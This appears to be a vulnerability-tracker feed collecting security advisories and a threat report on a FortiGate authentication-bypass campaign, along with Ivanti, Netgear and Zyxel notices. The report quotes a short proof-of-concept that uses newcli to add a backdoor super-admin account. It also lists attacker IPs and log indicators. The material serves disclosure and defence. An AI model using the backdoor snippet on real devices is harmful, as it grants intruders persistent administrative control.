Totolink CVE-2024-2353 CVE-2024-24328 CVE-2024-24329
(likely) Four-Faith CVE-2024-9644

Source: The Shadowserver Foundation

disabling cert checks: "we have not learned much" from @bagder@mastodon.social

1 month ago by Cédric Bonhomme

The article "Disabling cert checks: we have not learned much" by Daniel Stenberg, published on February 11, 2025, discusses the persistent issue of developers disabling SSL/TLS certificate verification in applications, despite the security risks involved. Stenberg reflects on the history of SSL/TLS usage, emphasizing that since 2002, curl has verified server certificates by default to prevent man-in-the-middle attacks. He highlights common challenges that lead developers to disable certificate verification, such as development environment mismatches, outdated CA stores, or expired certificates. Despite efforts to educate and design APIs that encourage secure practices, the problem persists, indicating a need for continued emphasis on the importance of proper certificate verification in software development.

A quick CVE search immediately reveals security vulnerabilities for exactly this problem published only last year:

CVE-2024-32928 – The libcurl CURLOPTSSLVERIFYPEER option was disabled on a subset of requests made by Nest production devices.
CVE-2024-56521 – An issue was discovered in TCPDF before 6.8.0. If libcurl is used, CURLOPTSSLVERIFYHOST and CURLOPTSSLVERIFYPEER are set unsafely.
CVE-2024-5261 – In affected versions of Collabora Online, in LibreOfficeKit, curl’s TLS certificate verification was disabled (CURLOPTSSLVERIFYPEER of false).

Related vulnerabilities: cve-2024-32928 cve-2024-56521 cve-2024-5261

Console Chaos: A Campaign Targeting Publicly Exposed Management Interfaces on Fortinet FortiGate Firewalls - Arctic Wolf

1 month ago by Alexandre Dulaunoy

Key Takeaways

Arctic Wolf observed a recent campaign affecting Fortinet FortiGate firewall devices with management interfaces exposed on the public internet.
The campaign involved unauthorized administrative logins on management interfaces of firewalls, creation of new accounts, SSL VPN authentication through those accounts, and various other configuration changes.
While the initial access vector is not definitively confirmed, a zero-day vulnerability is highly probable.
Organizations should urgently disable firewall management access on public interfaces as soon as possible.

Summary

In early December, Arctic Wolf Labs began observing a campaign involving suspicious activity on Fortinet FortiGate firewall devices. By gaining access to management interfaces on affected firewalls, threat actors were able to alter firewall configurations. In compromised environments, threat actors were observed extracting credentials using DCSync.

While the initial access vector used in this campaign is not yet confirmed, Arctic Wolf Labs assesses with high confidence that mass exploitation of a zero-day vulnerability is likely given the compressed timeline across affected organizations as well as firmware versions affected.

We are sharing details of this campaign to help organizations defend against this threat. Please note that our investigation of this campaign is ongoing, and we may add further detail to this article as we uncover additional information.

Update: On January 14, 2025, Fortinet published an advisory confirming the existence of an authentication bypass vulnerability affecting FortiOS and FortiProxy products, which was designated as CVE-2024-55591. The advisory also confirmed key details observed in the campaign described here. See our security bulletin for updated remediation guidance.

Background

FortiGate next-generation firewall (NGFW) products have a feature that allow administrators to access the command-line interface through the web-based management interface. This comes as a standard feature on most NGFW devices and is a convenient feature for administrators.

The CLI Console feature in the FortiGate web interface (source)

According to the FortiGate Knowledge Base, when changes are made via the web-based CLI console, the user interface is logged as jsconsole along with the source IP address of whomever made the changes. In contrast, changes made via ssh would be listed as ssh for the user interface instead.

Behind the scenes, there are proprietary command-line tools that FortiGate software uses to perform administrative functions. One binary in particular, newcli, is described as managing the creation and termination of CLI connections.

In a 2023 report by Synacktiv about CVE-2022-26118, a privilege escalation vulnerability, a proof-of-concept bash session is provided that demonstrates how threat actors could invoke the newcli utility to add backdoor users. Notably, the –userfrom switch specifies a value of jsconsole(127.0.0.1), suggesting that a loopback interface can be arbitrarily specified as the source IP address for initiation of a CLI console.

bash$ cat add_backdoor_user.txt
config system admin user
    edit backdoor
        set password backdoor
        set profileid Super_User
        set adom "all_adoms"
    end
exit
bash$ cat add_backdoor_user.txt | /bin/newcli system system \
    --userfrom="jsconsole(127.0.0.1)" \
    --adminprof=Super_User --adom=root --from_sid=0

Although we do not have direct confirmation that such commands are utilized in the present campaign, the observed activities follow a similar pattern in the way they invoke jsconsole.

What We Know About the Campaign

At a high level, the present campaign can be thought of in 4 distinct phases:

Vulnerability scanning (November 16, 2024 to November 23, 2024)
Reconnaissance (November 22, 2024 to November 27, 2024)
SSL VPN configuration (December 4, 2024 to December 7, 2024)
Lateral Movement (December 16, 2024 to December 27, 2024)

These phases are delineated by the types of malicious configuration changes that were observed on compromised firewall devices across multiple victim organizations, and the activities that were taken by threat actors upon gaining access. Note, however, that our portrayal of these phases may be incomplete or oversimplified given that our visibility is likely limited to a narrow subset of the overall activity in the campaign.

What stands out about these activities in contrast with legitimate firewall activities is the fact that they made extensive use of the jsconsole interface from a handful of unusual IP addresses. Given subtle differences in tradecraft and infrastructure between intrusions, it is possible that multiple individuals or groups may have been involved in this campaign, but jsconsole usage was a common thread across the board.

The firmware versions of devices that were affected ranged between 7.0.14 and 7.0.16, which were released on February 2024 and October 2024 respectively.

Phase 1: Vulnerability scanning

One of the most notable indicators of compromise in this campaign is the use of jsconsole sessions with connections to and from unusual IP addresses, such as loopback addresses and popular DNS resolvers including Google Public DNS and Cloudflare. These combinations of source and destination IP addresses are not typical for jsconsole activity, making them an ideal target for threat hunting. These values appear to be spoofed, since jsconsole traffic to and from these IP addresses would not be possible without the threat actor having control over them.

Source IP Address	Destination IP address
127.0.0.1	127.0.0.1
8.8.8.8	8.8.4.4
1.1.1.1	2.2.2.2

Anomalous source and destination IP addresses for jsconsole administrative logins

Numerous successful admin login events from jsconsole were observed originating from the anomalous IP addresses, all using the admin account. Interestingly, jsconsole login events using loopback IP addresses seemed to occur more frequently than events with the other two pairs of addresses using DNS resolvers, especially during the first phase of the campaign. In contrast, beyond the first phase of the campaign, events with the DNS resolver IP addresses were more commonly associated with configuration changes than those with the loopback addresses.

date=2024-12-07 time=REDACTED devname="REDACTED" devid="REDACTED" eventtime=REDACTED tz="-0500" logid="0100032001" type="event" subtype="system" level="information" vd="root" logdesc="Admin login successful" sn="REDACTED" user="admin" ui="jsconsole" method="jsconsole" srcip=127.0.0.1 dstip=127.0.0.1 action="login" status="success" reason="none" profile="super_admin" msg="Administrator admin logged in successfully from jsconsole"

Additionally, there was corresponding traffic to and from loopback interfaces on TCP port 8023, which according to the Fortinet Knowledge Base is the web CLI port. Loopback traffic was also observed on TCP port 9980, which is used internally by the web-based management interface for security fabric and REST API queries on FortiGate devices. The timestamps of traffic on ports 8023 and 9980 matched jsconsole activity down to the second.

date=2024-12-07 time=REDACTED devname="REDACTED" devid="REDACTED" eventtime=REDACTED tz="-0500" logid="0001000014" type="traffic" subtype="local" level="notice" vd="root" srcip=127.0.0.2 srcport=REDACTED srcintf="root" srcintfrole="undefined" dstip=127.0.0.1 dstport=8023 dstintf="root" dstintfrole="undefined" srccountry="Reserved" dstcountry="Reserved" sessionid=REDACTED proto=6 action="close" policyid=0 service="tcp/8023" trandisp="noop" app="tcp/8023" duration=1 sentbyte=879 rcvdbyte=778 sentpkt=14 rcvdpkt=14 appcat="unscanned"

The first occurrences of this type of jsconsole activity were observed in the wild as early as November 16, 2024 across victim organizations in a variety of sectors. It is important to note, however, that although malicious logins were observed this early, the first signs of impactful configuration changes from these console sessions only began to ramp up en masse between December 4, 2024 and December 7, 2024.

Web management HTTPS activity

Correlated closely in time with the jsconsole activity, we observed HTTPS web management traffic from a group of VPS hosting providers’ IP addresses. Some of these IP addresses would later proceed to establish SSL VPN tunnels to the same compromised firewalls. These HTTPS events took place tens of seconds before the jsconsole activity. There are several noteworthy aspects to this traffic:

Action was client-rst, which means that the client side of the TCP session has sent an RST packet to terminate the connection.
The amount of data sent to the destination firewall was over a megabyte in size.
The duration of the session was over 100 seconds.
The app was “Web Management(HTTPS)”. In the example below, the HTTPS management port was 8443 but this is set to 443 by default. However, it can be set arbitrarily to another value and is often different depending on the environment.
The traffic originated from a WAN interface.

date=2024-12-15 time=REDACTED devname="REDACTED" devid="REDACTED" eventtime=REDACTED tz="-0500" logid="0001000014" type="traffic" subtype="local" level="notice" vd="root" srcip=157.245.3.251 srcport=56010 srcintf="wan1" srcintfrole="wan" dstip=REDACTED dstport=8443 dstintf="root" dstintfrole="undefined" srccountry="United States" dstcountry="United States" sessionid=REDACTED proto=6 action="client-rst" policyid=0 policytype="local-in-policy" service="HTTPSMGMT" trandisp="noop" app="Web Management(HTTPS)" duration=570 sentbyte=1315775 rcvdbyte=2084318 sentpkt=18225 rcvdpkt=18092 appcat="unscanned"

While the technical details of the suspected vulnerability are not yet known, the characteristics outlined here for malicious web management traffic provide a glimpse into the nature of a potential exploit.

Indications of opportunistic exploitation

Typically, the total count of successful jsconsole logins from anomalous IP addresses ranged between several hundred and several thousand entries for each victim organization, spanning between November 16, 2024 and the end of December 2024. Most of these sessions were short-lived, with corresponding logout events within a second or less. In some instances, multiple login or logout events occurred within the same second, with up to 4 events occurring per second.

The victimology in this campaign was not limited to any specific sectors or organization sizes. The diversity of victim organization profiles combined with the appearance of automated login/logout events suggests that the targeting was opportunistic in nature rather than being deliberately and methodically targeted.

Phase 2: Reconnaissance

In the first phase of the campaign, although there were extensive login and logout events that appeared to be automated, configuration changes were nonexistent. Then, beginning on November 22, 2024, the first unauthorized configuration changes were made:

date=2024-11-22 time=REDACTED devname="REDACTED" devid="REDACTED" eventtime=REDACTED tz="-0500" logid="0100044546" type="event" subtype="system" level="information" vd="root" logdesc="Attribute configured" user="admin" ui="jsconsole(1.1.1.1)" action="Edit" cfgtid=REDACTED cfgpath="system.console" cfgattr="output[more->standard]" msg="Edit system.console "

date=2024-11-22 time=REDACTED devname="REDACTED" devid="REDACTED" eventtime=REDACTED tz="-0500" logid="0100044546" type="event" subtype="system" level="information" vd="root" logdesc="Attribute configured" user="admin" ui="jsconsole(1.1.1.1)" action="Edit" cfgtid=REDACTED cfgpath="system.console" cfgattr="output[standard->more]" msg="Edit system.console "

Similar configuration changes were made across a handful of victim organizations until November 27, 2024. The output setting referenced in these logs is used to toggle whether user interaction is needed to advance to the next page of console output. The “more” setting means that interaction is required to advance long output and “standard” prints out all output at once. In all intrusions, this setting was first set to “standard” and then set to “more”, usually within 10-30 seconds of each other.

The purpose of these changes is not known, but it may hint at threat actors’ preferred mode of interacting with the web console. It is also possible that this was a simple means of verifying that access was successfully obtained to commit changes on exploited firewalls.

Phase 3: SSL VPN configuration

In the third phase of the campaign, beginning on December 4, 2024, threat actors began to make more substantial changes on compromised devices, with the goal of gaining SSL VPN access. There were several distinct approaches for how to achieve this.

In some intrusions, new super admin accounts were created, adhering to an alphanumeric naming convention consisting of 5 characters. In other intrusions, the naming convention was slightly different, with 6 randomized alphanumeric characters.

date=2024-12 time=REDACTED devname="REDACTED" devid="REDACTED" eventtime=1733554955692189638 tz="-0500" logid="0100044547" type="event" subtype="system" level="information" vd="root" logdesc="Object attribute configured" user="admin" ui="jsconsole(127.0.0.1)" action="Add" cfgtid=REDACTED cfgpath="system.admin" cfgobj="Dbr3W" cfgattr="password[*]accprofile[super_admin]vdom[root]" msg="Add system.admin Dbr3W"

The newly created super admin accounts were then used to create several local user accounts (up to 6 per device) with similar naming conventions, which were ultimately added to existing groups that had been previously created by victim organizations for SSL VPN access.

In other intrusions, existing accounts were hijacked by threat actors to gain SSL VPN access. As with the previous scenario, these accounts were also added to existing groups with VPN access. This included use of the guest account, which is created by default on FortiGate devices. The password on the guest account was reset to facilitate this process.

Threat actors were also observed creating new SSL VPN portals which they added user accounts to directly. In addition, some threat actors assigned specific ports to their VPN portal configurations, changing them between different sessions. These ports included 4433, 59449, and 59450, among others.

Upon making the necessary changes, threat actors established SSL VPN tunnels with the affected devices. All of the client IP addresses of the tunnels originated from a handful of VPS hosting providers.

In most instances where firewall configuration changes were made, the ui field showed jsconsole with loopback or public DNS resolver IP addresses in parentheses (e.g., jsconsole(8.8.8.8)). However, there were several intrusions where the same field referenced other remote IP addresses, suggesting that the threat actor did not attempt to spoof their actual IP addresses in those instances. These were some of the same client IP addresses of the malicious tunnels that were later established. There were also instances where the https ui was used instead of jsconsole, and newly created accounts were used instead of the admin account for those sessions.

Phase 4: Lateral Movement

In the final phase observed in this campaign, upon successfully establishing SSL VPN access in victim organization environments, threat actors sought to extract credentials for lateral movement.

DC sync was used with previously obtained domain admin credentials. The threat actors used a workstation hostname of kali. At this point, the threat actors were removed from affected environments before they could proceed any further.

How Arctic Wolf Protects Its Customers

Arctic Wolf is committed to ending cyber risk with its customers, and when active ransomware campaigns are identified we move quickly to protect our customers.

Arctic Wolf Labs has leveraged threat intelligence around this campaign to implement new detections in the Arctic Wolf Platform to protect Managed Detection and Response (MDR) customers. As we discover any new information, we will enhance our detections to account for additional indicators of compromise and techniques leveraged by this threat actor.

Remediation

In December 2024, Arctic Wolf sent out a security bulletin warning of the activity observed in this campaign. See our follow-up security bulletin published on January 14, 2025 for additional remediation guidance, including version details.

In addition to locking down management interfaces, as a security best practice, regularly upgrading the firmware on firewall devices to the latest available version is advised to protect against known security issues.

Conclusion

In this campaign, we observed opportunistic exploitation of a handful of victim organizations. While the final objectives of the threat actor are not known, the technical details we’ve provided should help defenders protect against the early stages of this campaign.

As documented in this campaign and in several others, management interfaces should not be exposed on the public internet, regardless of the product specifics. Instead, access to management interfaces should be limited to trusted internal users. When such interfaces are left open on the public internet, it expands the attack surface available to threat actors, opening up the potential to identify vulnerabilities that expose features that are meant to be limited to trusted administrators.

From a security best practices standpoint, these types of misconfigurations should be addressed promptly to protect against not only this vulnerability, but an entire class of other potential vulnerabilities in the future.

Note: On December 12, 2024, Arctic Wolf Labs notified Fortinet about the activity observed in this campaign. Confirmation was received by FortiGuard Labs PSIRT on December 17, 2024 that the activity was known and under investigation.

Acknowledgements

Arctic Wolf Labs would like to acknowledge members of the Security Services team for their role in identifying this campaign. We thank Mo Sharif who identified the campaign and associated TTPs, as well as Ruben Raymundo and Trevor Daher who helped investigate the intrusions.

Appendix

Tactics, Techniques, and Procedures (TTPs)

Tactic: Initial Access
Technique: T1190: Exploit Public-Facing Application
Sub-techniques or Tools: • Exploited public-facing FortiGate firewall management interfaces
Tactic: Persistence
Technique: T1136.001: Create Account: Local Account
Sub-techniques or Tools: • Created multiple local admin accounts
Tactic: T1133: External Remote Services
Technique: • Modified SSL VPN configurations
Sub-techniques or Tools:
Tactic: T1078.001: Valid Accounts: Default Accounts
Technique: • Hijacked default guest account to obtain SSL VPN access
Sub-techniques or Tools:
Tactic: Credential Access
Technique: T1003.006: OS Credential Dumping: DCSync
Sub-techniques or Tools: • The threat actors used a domain admin account to conduct a DCSync attack

Vulnerabilities Exploited

Vulnerability: No CVE registered
Use: The activity observed in this article has not been assigned a CVE as of publication.

Indicators of Compromise (IoCs)

Indicator: 23.27.140[.]65
Type: IPv4 Address
Description: • AS149440 – Evoxt Enterprise• SSL VPN client IP address• Web management interface client
Indicator: 66.135.27[.]178
Type: IPv4 Address
Description: • AS20473 – The Constant Company Llc• SSL VPN client IP address• Web management interface client
Indicator: 157.245.3[.]251
Type: IPv4 Address
Description: • AS14061 – Digitalocean Llc• SSL VPN client IP address• Web management interface client
Indicator: 45.55.158[.]47
Type: IPv4 Address
Description: • AS14061 – Digitalocean Llc• SSL VPN client IP address• Web management interface client
Indicator: 167.71.245[.]10
Type: IPv4 Address
Description: • AS14061 – Digitalocean Llc• SSL VPN client IP address• Web management interface client
Indicator: 137.184.65[.]71
Type: IPv4 Address
Description: • AS14061 – Digitalocean Llc• SSL VPN client IP address
Indicator: 155.133.4[.]175
Type: IPv4 Address
Description: • AS62240 – Clouvider Limited• SSL VPN client IP address• Web management interface client
Indicator: 31.192.107[.]165
Type: IPv4 Address
Description: • AS50867 – Hostkey B.V.• SSL VPN client IP address
Indicator: 37.19.196[.]65
Type: IPv4 Address
Description: • AS212238 – Datacamp Limited• Web management interface client
Indicator: 64.190.113[.]25
Type: IPv4 Address
Description: • AS399629 – BL Networks• Web management interface client

Detection Opportunities

As part of our Managed Detection and Response service, Arctic Wolf has detections in place for techniques described in this blog article, in addition to other techniques employed by threat actors described here.

Firewall

This campaign was identified early because external monitoring was in place for unexpected firewall configuration changes.

As described in this article, jsconsole activity was observed from a handful of anomalous IP addresses that appeared to be spoofed. Monitoring for jsconsole activity from commonly spoofed IP addresses might be helpful in responding early to such attacks. The weakness of this approach is that threat actors may choose to spoof jsconsole activity using different IP addresses in the future.

Additionally, although details of the vulnerability in this article are not yet available, monitoring for web management traffic on the WAN interface over 1MB originating from VPS hosting IP addresses may be a worthwhile means of detecting exploitation. This detection criteria could be further narrowed down by setting a minimum session duration of 100 seconds. Please note, however, that a better long-term approach to this detection would be to remove web management from the public internet entirely.

Finally, given that malicious SSL VPN logins were known to take place with client IP addresses originating from VPS hosting providers, monitoring for unexpected logins from such providers would also potentially be worth exploring.

Additional Resources

Get actionable insights and access to the security operations expertise of one of the largest security operations centers (SOCs) in the world in Arctic Wolf’s 2024 Security Operations Report.

Learn what’s new, what’s changed, and what’s ahead for the cybersecurity landscape, with insights from 1,000 global IT and security leaders in the Arctic Wolf State of Cybersecurity: 2024 Trends Report.

About Arctic Wolf Labs

Arctic Wolf Labs is a group of elite security researchers, data scientists, and security development engineers who explore security topics to deliver cutting-edge threat research on new and emerging adversaries, develop and refine advanced threat detection models with artificial intelligence, including machine learning, and drive continuous improvement in the speed, scale, and detection efficacy of Arctic Wolf’s solution offerings. With their deep domain knowledge, Arctic Wolf Labs brings world-class security innovations to not only Arctic Wolf’s customer base, but the security community at large.

Authors

Stefan Hostetler

Stefan is a Lead Threat Intelligence Researcher at Arctic Wolf. With over a decade of industry experience under his belt, he focuses on extracting actionable insight from novel threats to help organizations protect themselves effectively.

Julian Tuin

Julian is a Senior Threat Intelligence Researcher at Arctic Wolf Labs with more than 6 years of industry experience. He has experience in identifying and tracking campaigns for new and emerging threats.

Trevor Daher

Trevor Daher is a Technical Lead within Arctic Wolf’s Security Services group supporting the Managed Detection and Response (MDR) service.

Jon Grimm

Jon is a Threat Intelligence Analyst at Arctic Wolf dedicated to identifying new cyber threats and producing actionable intelligence that enhances organizational defenses. He has background of 10 years’ experience in several domains of cybersecurity, holds a bachelor’s degree in law enforcement, and holds several industry certifications (CISSP, GCFA, GCTI).

Alyssa Newbury

Alyssa Newbury is a Threat Intelligence Analyst at Arctic Wolf, with over a decade of experience in tactical threat intelligence and cybersecurity. She has background working for various agencies within the intelligence community, including the FBI and NGA, and focuses primarily on researching and identifying emerging cyber threats and producing impactful finished intelligence products.

Joe Wedderspoon

Joe Wedderspoon is a Sr. Forensic Analyst at Arctic Wolf Incident Response, focused on leading complex incident response and digital forensic investigations. He holds multiple certifications and has over 7 years of operational experience in incident response, defensive cyber operations, and researching adversary tradecraft in both the public and private sectors.

Markus Neis

Markus Neis is a Principal Threat Intelligence Researcher in Arctic Wolf Labs focused on leading advanced threat research. He has more than a decade of experience in researching adversary tradecraft and responding to sophisticated attacks.

Related vulnerabilities: cve-2024-55591 cve-2022-26118 cve-2024-55591

Fortinet - Authentication bypass in Node.js websocket module and CSF requests

1 month ago by Alexandre Dulaunoy

PSIRT | FortiGuard Labs

Summary

An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] affecting FortiOS and FortiProxy may allow a remote attacker to gain super-admin privileges via crafted requests to Node.js websocket module or via crafted CSF proxy requests.

Please note that reports show this is being exploited in the wild.

Version

Affected

Solution

FortiOS 7.6

Not affected

Not Applicable

FortiOS 7.4

Not affected

Not Applicable

FortiOS 7.2

Not affected

Not Applicable

FortiOS 7.0

7.0.0 through 7.0.16

Upgrade to 7.0.17 or above

FortiOS 6.4

Not affected

Not Applicable

FortiProxy 7.6

Not affected

Not Applicable

FortiProxy 7.4

Not affected

Not Applicable

FortiProxy 7.2

7.2.0 through 7.2.12

Upgrade to 7.2.13 or above

FortiProxy 7.0

7.0.0 through 7.0.19

Upgrade to 7.0.20 or above

FortiProxy 2.0

Not affected

Not Applicable

Follow the recommended upgrade path using our tool at: https://docs.fortinet.com/upgrade-tool

IoCs

The following log entries are possible IOC's:

Following login activity log with random scrip and dstip:
type="event" subtype="system" level="information" vd="root" logdesc="Admin login successful" sn="1733486785" user="admin" ui="jsconsole" method="jsconsole" srcip=1.1.1.1 dstip=1.1.1.1 action="login" status="success" reason="none" profile="super_admin" msg="Administrator admin logged in successfully from jsconsole"
Following admin creation log with seemingly randomly generated user name and source IP:
type="event" subtype="system" level="information" vd="root" logdesc="Object attribute configured" user="admin" ui="jsconsole(127.0.0.1)" action="Add" cfgtid=1411317760 cfgpath="system.admin" cfgobj="vOcep" cfgattr="password[*]accprofile[super_admin]vdom[root]" msg="Add system.admin vOcep"
The following IP addresses were mostly found used by attackers in above logs:
1.1.1.1
127.0.0.1
2.2.2.2
8.8.8.8
8.8.4.4

Please note that the above IP parameters are not the actual source IP addresses of the attack traffic, they are generated arbitrarily by the attacker as a parameter. Because of this they should not be used for any blocking.

Please note as well that sn and cfgtid are not relevant to the attack.

The operations performed by the Threat Actor (TA) in the cases we observed were part or all of the below:
- Creating an admin account on the device with random user name
- Creating a Local user account on the device with random user name
- Creating a user group or adding the above local user to an existing sslvpn user group
- Adding/changing other settings (firewall policy, firewall address, …)
- Logging in the sslvpn with the above added local users to get a tunnel to the internal network.

Admin or Local user created by the TA is randomly generated. e.g:
Gujhmk
Ed8x4k
G0xgey
Pvnw81
Alg7c4
Ypda8a
Kmi8p4
1a2n6t
8ah1t6
M4ix9f
…etc…

Additionally, the TA has been seen using the following IP addresses:

45.55.158.47 [most used IP address]
87.249.138.47
155.133.4.175
37.19.196.65
149.22.94.37

Workaround

Disable HTTP/HTTPS administrative interface

Limit IP addresses that can reach the administrative interface via local-in policies:

config firewall address
edit "my_allowed_addresses"
set subnet
end

Then create an Address Group:

config firewall addrgrp
edit "MGMT_IPs"
set member "my_allowed_addresses"
end

Create the Local in Policy to restrict access only to the predefined group on management interface (here: port1):

config firewall local-in-policy
edit 1
set intf port1
set srcaddr "MGMT_IPs"
set dstaddr "all"
set action accept
set service HTTPS HTTP
set schedule "always"
set status enable
next

edit 2
set intf "any"
set srcaddr "all"
set dstaddr "all"
set action deny
set service HTTPS HTTP
set schedule "always"
set status enable
end

If using non default ports, create appropriate service object for GUI administrative access:

config firewall service custom
edit GUI_HTTPS
set tcp-portrange 443
next

edit GUI_HTTP
set tcp-portrange 80
end

Use these objects instead of "HTTPS HTTP "in the local-in policy 1 and 2 below.

Please note that the trusthost feature achieves the same as the local-in policies above only if all GUI users are configured with it. Therefore, the local-in policies above are the preferred workaround.

Please note as well that an attacker needs to know an admin account's username to perform the attack and log in the CLI. Therefore, having a non-standard and non-guessable username for admin accounts does offer some protection, and is, in general, a best practice. Keep in mind however that the targeted websocket not being an authentication point, nothing would prevent an attacker from bruteforcing the username.

Please contact customer support for assistance.

CSF requests issue:

Disable Security Fabric from the CLI:

Config system csf
Set status disable
end

Acknowledgement

Fortinet is pleased to thank Sonny of watchTowr (https://watchtowr.com/)) for reporting the CSF related vulnerability under responsible disclosure.

Timeline

2025-01-14: Format
2025-01-15: Added non-standard admin account username best practice
2025-01-15: Clarified that IP addresses "under attacker control" means they are arbitrarily generated by the attacker
2025-01-21: Added IPS package info
2025-01-24: Removed IPS package info
2025-02-11: Added CVE-2025-24472 and its acknowledgement

CVE-2024-55591 and CVE-2025-24472

Related vulnerabilities: cve-2024-55591 cve-2025-24472

February Security Advisory Ivanti Connect Secure (ICS),Ivanti Policy Secure (IPS) and Ivanti Secure Access Client (ISAC) (Multiple CVEs)

1 month ago by Alexandre Dulaunoy

February Security Advisory Ivanti Connect Secure (ICS),Ivanti Policy Secure (IPS) and Ivanti Secure Access Client (ISAC) (Multiple CVEs)

Primary Product

Connect-Secure

Created Date

Feb 11, 2025 3:01:15 PM

Last Modified Date

Feb 11, 2025 3:37:50 PM

Summary

Ivanti has released updates for Ivanti Connect Secure (ICS),Ivanti Policy Secure (IPS) and Ivanti Secure Access Client (ISAC) which addresses medium, high and critical severity vulnerabilities.

We are not aware of any customers being exploited by these vulnerabilities at the time of disclosure.

Vulnerability Details

CVE Number

Description

CVSS Score (Severity)

CVSS Vector

CWE

Impacted Products

CVE-2024-38657

External control of a file name in Ivanti Connect Secure before version 22.7R2.4 and Ivanti Policy Secure before version 22.7R1.3 allows a remote authenticated attacker with admin privileges to write arbitrary files.

9.1 (Critical)

CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CWE-73

Connect Secure & Policy Secure

CVE-2025-22467

A stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.6 allows a remote authenticated attacker to achieve remote code execution.

9.9 (Critical)

CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CWE-121

Connect Secure

CVE-2024-10644

Code injection in Ivanti Connect Secure before version 22.7R2.4 and Ivanti Policy Secure before version 22.7R1.3 allows a remote authenticated attacker with admin privileges to achieve remote code execution.

9.1 (Critical)

CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CWE-94

Connect Secure & Policy Secure

CVE-2024-12058

External control of a file name in Ivanti Connect Secure before version 22.7R2.6 and Ivanti Policy Secure before version 22.7R1.3 allows a remote authenticated attacker with admin privileges to read arbitrary files.

6.8 (Medium)

CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N

CWE-73

Connect Secure & Policy Secure

CVE-2024-13830

Reflected XSS in Ivanti Connect Secure before version 22.7R2.6 and Ivanti Policy Secure before version 22.7R1.3 allows a remote unauthenticated attacker to obtain admin privileges. User interaction is required.

6.1 (Medium)

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CWE-79

Connect Secure & Policy Secure

CVE-2024-13842

A hardcoded key in Ivanti Connect Secure before version 22.7R2.3 and Ivanti Policy Secure before version 22.7R1.3 allows a local unauthenticated attacker to read sensitive data.

6.0 (Medium)

CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N

CWE-321

Connect Secure & Policy Secure

CVE-2024-13843

Cleartext storage of information in Ivanti Connect Secure before version 22.7R2.6 and Ivanti Policy Secure before version 22.7R1.3 allows a local unauthenticated attacker to read sensitive data.

6.0 (Medium)

CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N

CWE-312

Connect Secure & Policy Secure

CVE-2024-13813

Insufficient permissions in Ivanti Secure Access Client before version 22.8R1 allows a local authenticated attacker to delete arbitrary files.

7.1 (High)

CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

CWE-732

Secure Access Client

Affected Versions

Product Name

Affected Versions

Resolved Versions

Patch Availability

Ivanti Connect Secure (ICS)

22.7R2.5 and below

22.7R2.6

Download Portal

https://portal.ivanti.com/

Ivanti Policy Secure (IPS)

22.7R1.2 and below

22.7R1.3

Download Portal

https://portal.ivanti.com/

Ivanti Secure Access Client (ISAC)

22.7R4 and below

22.8R1

Download Portal

https://portal.ivanti.com/

Solution

These vulnerabilities are resolved on the latest version of the product and can be accessed in the download portal (Login Required):

Ivanti Connect Secure 22.7R2.6
Ivanti Policy Secure 22.7R1.3
Ivanti Secure Access Client 22.8R1

Acknowledgements

Ivanti would like to thank the following for reporting the relevant issues and for working with Ivanti to help protect our customers:

Matthew Galligan, CISA Rapid Action Force (CVE-2024-38657)
Ori David of Akamai (CVE-2024-37374, CVE-2024-37375)
sim0nsecurity of HackerOne (CVE-2024-13813)

Note: Ivanti is dedicated to ensuring the security and integrity of our enterprise software products. We recognize the vital role that security researchers, ethical hackers, and the broader security community play in identifying and reporting vulnerabilities. Visit HERE to learn more about our Vulnerability Disclosure Policy.

FAQ

Are you aware of any active exploitation of these vulnerabilities?

We are not aware of any customers being exploited by these vulnerabilities prior to public disclosure. These vulnerabilities were disclosed through our responsible disclosure program.

How can I tell if I have been compromised?
Currently, there is no known public exploitation of this vulnerability that could be used to provide a list of indicators of compromise.
What should I do if I need help?

If you have questions after reviewing this information, you can log a case and/or request a call via the Success Portal

Are any of these vulnerability fixes backported to any of the 9.x versions?

No. The Pulse Connect Secure 9.x version of the product reached End of Engineering June 2024 and has reached End-of-Support as of December 31, 2024. Because of this, the 9.x version of Connect Secure no longer receives backported fixes. We strongly encourage customers to upgrade to Ivanti Connect Secure 22.7 to benefit from important security updates that we have made throughout the solution.

What does it mean when a vulnerability describes remote authenticated attackers?

It means that an attacker who is able to interact with the vulnerable component and pass authentication is able to exploit the vulnerability.

Article Number :

000097586

Unauthenticated RCE on Some Netgear WiFi Routers, PSV-2023-0039

1 month ago by Cédric Bonhomme

NETGEAR has released fixes for an unauthenticated RCE security vulnerability on the following product models:

XR1000 fixed in firmware version 1.0.0.74
XR1000v2 fixed in firmware version 1.1.0.22
XR500 fixed in firmware version 2.3.2.134

NETGEAR strongly recommends that you download the latest firmware as soon as possible.

Related vulnerabilities: psv-2023-0039 cve-2025-25246

Command injection and insecure default credentials vulnerabilities in certain legacy DSL CPE from Zyxel

1 month ago by Cédric Bonhomme

Summary

Zyxel recently became aware of CVE-2024-40890 and CVE-2024-40891 being mentioned in a post on GreyNoise’s blog. Additionally, VulnCheck informed us that they will publish the technical details regarding CVE-2024-40891 and CVE-2025-0890 on their blog. We have confirmed that the affected models reported by VulnCheck, VMG1312-B10A, VMG1312-B10B, VMG1312-B10E, VMG3312-B10A, VMG3313-B10A, VMG3926-B10B, VMG4325-B10A, VMG4380-B10A, VMG8324-B10A, VMG8924-B10A, SBG3300, and SBG3500, are legacy products that have reached end-of-life (EOL) for years. Therefore, we strongly recommend that users replace them with newer-generation products for optimal protection. What are the vulnerabilities?

CVE-2024-40890

UNSUPPORTED WHEN ASSIGNED

